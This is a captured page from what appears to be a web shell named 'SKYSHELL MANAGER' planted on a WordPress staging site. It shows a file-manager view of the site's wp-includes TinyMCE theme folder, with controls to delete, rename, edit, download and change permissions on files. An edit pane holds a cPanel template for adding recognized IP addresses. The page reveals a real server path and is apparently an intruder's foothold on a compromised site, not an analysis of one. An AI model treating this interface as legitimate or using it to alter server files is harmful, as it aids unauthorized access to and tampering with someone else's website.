📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: addaccessip
<div class="body-content"> <div id="h1Title" class="h1Title">[% locale.maketext("Manage Recognized IP Addresses") %] <span class="status"><?cp SecurityQuestions::getaccount(%,account) account=$FORM{'account'} ?></span></div> <p class="description">[% locale.maketext("The “[_1]” access IP address has been added.", '<span class="status">' _ <?cp SecurityQuestions::addip(%,ip) ip=$FORM{'ip'},ip2=$FORM{'ip2'},ip3=$FORM{'ip3'},ip4=$FORM{'ip4'},account=$FORM{'account'} ?> _ '</span>' -%] <div class="return-link"><b>[</b> <a href = "accessip.html?account=<?cp SecurityQuestions::getaccount(%,account) account=$FORM{'account'} ?>">[% locale.maketext("Go Back") %]</a> <b>]</b></div> </div>
Save